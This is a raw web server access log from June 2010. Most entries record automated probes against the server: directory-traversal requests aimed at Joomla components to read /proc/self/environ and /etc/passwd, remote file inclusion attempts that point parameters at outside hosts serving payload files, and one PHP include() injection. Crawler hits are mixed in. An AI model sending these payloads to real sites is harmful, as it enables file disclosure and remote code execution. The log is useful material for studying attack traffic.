81.93.240.99 - - [13/Jun/2010:04:23:15 -0500] "GET /index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:04:23:31 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:04:23:34 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:04:23:36 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:04:23:36 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.63 - - [13/Jun/2010:04:23:46 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.63 - - [13/Jun/2010:04:23:46 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.99 - - [13/Jun/2010:04:24:00 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.99 - - [13/Jun/2010:04:24:00 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:04:24:07 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:04:24:07 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
194.146.226.69 - - [13/Jun/2010:04:24:35 -0500] "GET /logs/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
194.146.226.69 - - [13/Jun/2010:04:24:35 -0500] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.46.13.87 - - [13/Jun/2010:04:24:36 -0500] "GET /logs/access_log.1265760000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
95.156.233.139 - - [13/Jun/2010:04:24:40 -0500] "GET //cgi-bin//classes/adodbt/sql.php?classes_dir=http://www.tbcslough.org.uk/libraries/tcpdf/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
95.156.233.139 - - [13/Jun/2010:04:24:40 -0500] "GET /logs//cgi-bin//classes/adodbt/sql.php?classes_dir=http://www.tbcslough.org.uk/libraries/tcpdf/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
95.156.233.139 - - [13/Jun/2010:04:24:40 -0500] "GET /logs/access_log.1271548800//cgi-bin//classes/adodbt/sql.php?classes_dir=http://www.tbcslough.org.uk/libraries/tcpdf/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
95.156.233.139 - - [13/Jun/2010:04:24:50 -0500] "GET //cgi-bin//classes/adodbt/sql.php?classes_dir=http://www.tbcslough.org.uk/libraries/tcpdf/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
95.156.233.139 - - [13/Jun/2010:04:24:50 -0500] "GET /logs//cgi-bin//classes/adodbt/sql.php?classes_dir=http://www.tbcslough.org.uk/libraries/tcpdf/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
95.156.233.139 - - [13/Jun/2010:04:24:50 -0500] "GET /logs/access_log.1271548800//cgi-bin//classes/adodbt/sql.php?classes_dir=http://www.tbcslough.org.uk/libraries/tcpdf/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
208.115.111.248 - - [13/Jun/2010:04:25:22 -0500] "GET /logs/access_log.1218067200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
187.45.193.159 - - [13/Jun/2010:04:25:23 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.805"
208.115.111.248 - - [13/Jun/2010:04:25:24 -0500] "GET /logs/access_log.1218153600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
187.45.193.159 - - [13/Jun/2010:04:25:24 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
208.115.111.248 - - [13/Jun/2010:04:25:26 -0500] "GET /logs/access_log.1218240000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:04:25:28 -0500] "GET /logs/access_log.1218672000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:04:25:30 -0500] "GET /logs/access_log.1218758400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:04:25:33 -0500] "GET /logs/access_log.1218931200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:04:25:35 -0500] "GET /logs/access_log.1219017600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:04:25:37 -0500] "GET /logs/access_log.1219104000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:04:25:39 -0500] "GET /logs/access_log.1219363200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:04:25:42 -0500] "GET /logs/access_log.1219449600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
58.120.226.47 - - [13/Jun/2010:04:27:46 -0500] "GET /logs/access_log.1271548800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
87.250.255.243 - - [13/Jun/2010:04:28:03 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
89.111.176.22 - - [13/Jun/2010:04:29:20 -0500] "GET /?sourcedir=http://www.aiamasjid.com/school/modules/mod_poll/pdf? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
89.111.176.22 - - [13/Jun/2010:04:29:20 -0500] "GET /logs/?sourcedir=http://www.aiamasjid.com/school/modules/mod_poll/pdf? HTTP/1.1" 200 9328 "-""Mozilla/5.0"
89.111.176.22 - - [13/Jun/2010:04:29:20 -0500] "GET /logs/access_log.1271548800/?sourcedir=http://www.aiamasjid.com/school/modules/mod_poll/pdf? HTTP/1.1" 404 311 "-""Mozilla/5.0"
188.72.70.56 - - [13/Jun/2010:04:32:52 -0500] "GET /logs/access_log.1274572800%20%20/errors.php?error=http://www.ysymca.or.kr/bbs/icon/fx1.txt????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
188.72.70.56 - - [13/Jun/2010:04:32:52 -0500] "GET /errors.php?error=http://www.ysymca.or.kr/bbs/icon/fx1.txt????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
188.72.70.56 - - [13/Jun/2010:04:32:52 -0500] "GET /logs/errors.php?error=http://www.ysymca.or.kr/bbs/icon/fx1.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
91.121.208.42 - - [13/Jun/2010:04:33:46 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.803"
91.121.208.42 - - [13/Jun/2010:04:33:46 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
207.46.199.51 - - [13/Jun/2010:04:38:06 -0500] "GET /logs/access_log.1204761600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
219.240.36.36 - - [13/Jun/2010:04:40:00 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:04:40:24 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
62.44.82.61 - - [13/Jun/2010:04:42:57 -0500] "GET /ihm.php?p=http://www.pro-gaming.dk/fmkfoto/components/com_imagebrowser/pdf? HTTP/1.1" 404 291 "-""Mozilla/5.0"
62.44.82.61 - - [13/Jun/2010:04:42:57 -0500] "GET /logs/ihm.php?p=http://www.pro-gaming.dk/fmkfoto/components/com_imagebrowser/pdf? HTTP/1.1" 404 296 "-""Mozilla/5.0"
62.44.82.61 - - [13/Jun/2010:04:42:57 -0500] "GET /logs/access_log.1272067200/ihm.php?p=http://www.pro-gaming.dk/fmkfoto/components/com_imagebrowser/pdf? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.44.82.61 - - [13/Jun/2010:04:42:58 -0500] "GET /ihm.php?p=http://www.pro-gaming.dk/fmkfoto/components/com_imagebrowser/pdf? HTTP/1.1" 404 291 "-""Mozilla/5.0"
62.44.82.61 - - [13/Jun/2010:04:42:58 -0500] "GET /logs/access_log.1272067200/ihm.php?p=http://www.pro-gaming.dk/fmkfoto/components/com_imagebrowser/pdf? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.44.82.61 - - [13/Jun/2010:04:42:58 -0500] "GET /logs/ihm.php?p=http://www.pro-gaming.dk/fmkfoto/components/com_imagebrowser/pdf? HTTP/1.1" 404 296 "-""Mozilla/5.0"
62.44.82.61 - - [13/Jun/2010:04:43:02 -0500] "GET /logs/access_log.1270771200/ihm.php?p=http://www.pro-gaming.dk/fmkfoto/components/com_imagebrowser/pdf? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.44.82.61 - - [13/Jun/2010:04:43:04 -0500] "GET /logs/access_log.1270771200/ihm.php?p=http://www.pro-gaming.dk/fmkfoto/components/com_imagebrowser/pdf? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:04:43:39 -0500] "GET /logs/access_log.1270512000/index0.php?show=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:04:43:39 -0500] "GET /index0.php?show=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:04:43:39 -0500] "GET /logs/index0.php?show=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:04:43:43 -0500] "GET /logs/access_log.1270598400/index0.php?show=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:04:44:35 -0500] "GET /logs/access_log.1270512000/index0.php?show=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:04:44:35 -0500] "GET /logs/access_log.1270598400/index0.php?show=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:04:44:35 -0500] "GET /logs/index0.php?show=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:04:44:35 -0500] "GET /index0.php?show=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
189.108.172.26 - - [13/Jun/2010:04:44:36 -0500] "GET /logs/access_log.1274832000/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:04:44:51 -0500] "GET /logs/access_log.1274832000/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
219.240.36.36 - - [13/Jun/2010:04:45:03 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
67.195.112.180 - - [13/Jun/2010:04:45:09 -0500] "GET /logs/access_log.1198368000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
113.190.39.225 - - [13/Jun/2010:04:46:37 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://www.google.com.vn/imglanding?q=tattoo%20on%20burt&imgurl=http://www.zhippo.com/PrimalUrgeTattoosHOSTED/images/gallery/medium/bert.jpg&imgrefurl=http://www.luckybella.com/tattoos/Ryan_Cook/tattoos_38116.html&usg=__3tBbLvKgmHQo6yEZ0Av0sNQ4kS4=&h=450&w=343&sz=33&hl=vi&itbs=1&tbnid=eMxl4JLI091dOM:&tbnh=127&tbnw=97&prev=/images%3Fq%3Dtattoo%2Bon%2Bburt%26hl%3Dvi%26sa%3DG%26tbs%3Disch:1&sa=G&tbs=isch:1&start=0""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
58.120.226.47 - - [13/Jun/2010:04:47:30 -0500] "GET /index1.php?site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
58.120.226.47 - - [13/Jun/2010:04:47:40 -0500] "GET /logs/access_log.1271721600/index1.php?site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
58.120.226.47 - - [13/Jun/2010:04:47:40 -0500] "GET /logs/index1.php?site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
58.120.226.47 - - [13/Jun/2010:04:47:41 -0500] "GET /logs/access_log.1270944000/index1.php?site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
219.240.36.36 - - [13/Jun/2010:04:54:04 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:04:54:05 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:04:54:05 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
62.149.207.129 - - [13/Jun/2010:04:56:21 -0500] "GET /logs/access_log.1271548800/errors.php?error=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.149.207.129 - - [13/Jun/2010:04:56:21 -0500] "GET /errors.php?error=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
62.149.207.129 - - [13/Jun/2010:04:56:21 -0500] "GET /logs/errors.php?error=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.195.112.180 - - [13/Jun/2010:04:57:56 -0500] "GET /logs/access_log.1165363200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.178 - - [13/Jun/2010:04:59:36 -0500] "GET /logs/access_log.1214352000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.23.6.211 - - [13/Jun/2010:05:00:01 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:05:00:01 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:05:00:02 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:05:00:02 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:05:00:02 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:05:00:02 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:05:00:03 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:05:00:03 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:05:00:03 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:05:00:03 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:05:00:05 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:05:00:05 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:05:00:05 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:05:00:05 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:05:00:08 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:05:00:08 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
122.252.7.141 - - [13/Jun/2010:05:00:10 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:05:00:10 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:05:01:04 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:05:01:04 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
91.121.2.170 - - [13/Jun/2010:05:01:12 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.2.170 - - [13/Jun/2010:05:01:12 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.2.170 - - [13/Jun/2010:05:01:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
188.72.70.56 - - [13/Jun/2010:05:01:51 -0500] "GET /errors.php?error=http://www.ysymca.or.kr/bbs/icon/fx1.txt????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
188.72.70.56 - - [13/Jun/2010:05:01:51 -0500] "GET /logs/access_log.1271548800/errors.php?error=http://www.ysymca.or.kr/bbs/icon/fx1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
188.72.70.56 - - [13/Jun/2010:05:01:51 -0500] "GET /logs/errors.php?error=http://www.ysymca.or.kr/bbs/icon/fx1.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
219.240.36.36 - - [13/Jun/2010:05:03:04 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:05:03:04 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:05:03:05 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
208.116.46.58 - - [13/Jun/2010:05:06:40 -0500] "GET /logs/access_log.1274572800%20%20/index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:06:40 -0500] "GET /index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:06:40 -0500] "GET /logs/index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:07:13 -0500] "GET /logs/access_log.1274572800%20%20/index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:07:13 -0500] "GET /logs/index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:07:13 -0500] "GET /index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
64.34.165.224 - - [13/Jun/2010:05:07:14 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
208.116.46.58 - - [13/Jun/2010:05:07:14 -0500] "GET /index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:07:14 -0500] "GET /logs/index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:07:14 -0500] "GET /logs/access_log.1274572800/index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.34.165.224 - - [13/Jun/2010:05:07:14 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
